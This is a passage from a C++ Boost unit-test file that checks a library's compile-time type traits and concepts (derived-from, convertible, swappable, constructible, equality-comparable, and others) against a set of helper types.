BOOST_CHECK_EQUAL( ( slce::is_derived_from< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< volatile base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_derived_from< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(ConvertibleTo) {
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, volatile base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< inherited, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_convertible_to< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(CommonReference) {
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, inherited >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, volatile base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< inherited, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< volatile base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common_reference< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(Common) {
BOOST_CHECK_EQUAL( ( slce::is_common< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, inherited >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, const base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< inherited, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< other, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< const base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_common< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_common< int*, base >::value ), false );
}
BOOST_AUTO_TEST_CASE(Integral) {
BOOST_CHECK_EQUAL( ( slce::is_integral< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< const unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< volatile unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_integral< unsigned int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_integral< unsigned int* >::value ), false );
}
BOOST_AUTO_TEST_CASE(SignedIntegral) {
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< unsigned int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< const unsigned int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< volatile unsigned int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< unsigned int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_signed_integral< unsigned int* >::value ), false );
}
BOOST_AUTO_TEST_CASE(UnsignedIntegral) {
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< inherited >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< const unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< volatile unsigned int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< unsigned int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_unsigned_integral< unsigned int* >::value ), false );
}
BOOST_AUTO_TEST_CASE(Assignable) {
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< const base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_assignable< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< int*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< non_copyable&, non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< copyable&, copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_assignable< movable&, movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_assignable< partially_castable_t2&, partially_castable_t1 >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_assignable< fully_castable_t2&, fully_castable_t1 >::value ), true );
}
BOOST_AUTO_TEST_CASE(Swappable) {
BOOST_CHECK_EQUAL( ( slce::is_swappable< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable< movable >::value ), true );
}
BOOST_AUTO_TEST_CASE(SwappableWith) {
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, base& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, volatile int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< const base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< volatile base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base&, base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< base*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< const int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< volatile int, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< int&, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< int*, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< non_copyable, non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< copyable, copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< movable, movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< partially_castable_t2, partially_castable_t1 >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_swappable_with< fully_castable_t2, fully_castable_t1 >::value ), false );
}
BOOST_AUTO_TEST_CASE(Destructible) {
BOOST_CHECK_EQUAL( ( slce::is_destructible< destructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const destructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile destructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< destructible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< destructible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< non_destructible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const non_destructible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile non_destructible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_destructible< non_destructible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< non_destructible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< constructible_with_int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const constructible_with_int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile constructible_with_int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< constructible_with_int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< constructible_with_int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Constructible) {
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const default_constructible, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile default_constructible, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible&, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible*, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int&, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int*, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const constructible_with_int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile constructible_with_int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int&, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int*, int >::value ), false );
}
BOOST_AUTO_TEST_CASE(DefaultConstructible) {
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< const default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< volatile default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< default_constructible& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< default_constructible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< const constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< volatile constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< constructible_with_int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< constructible_with_int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(CopyConstructible) {
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< non_copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< movable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< movable* >::value ), true );
}
BOOST_AUTO_TEST_CASE(MoveConstructible) {
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< non_copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< movable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< movable* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Boolean) {
BOOST_CHECK_EQUAL( ( slce::is_boolean< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const bool >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile bool >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool_like >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const bool_like >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile bool_like >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool_like& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool_like* >::value ), false );
}
BOOST_AUTO_TEST_CASE(EqualityComparable) {
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable_inconvertible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable_inconvertible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< partially_comparable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< partially_comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(EqualityComparableWith) {
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< const comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< volatile comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable&, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable*, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable_inconvertible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable_inconvertible, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable_convertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable_convertible, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< incomparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< incomparable, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, int >::value ), true );
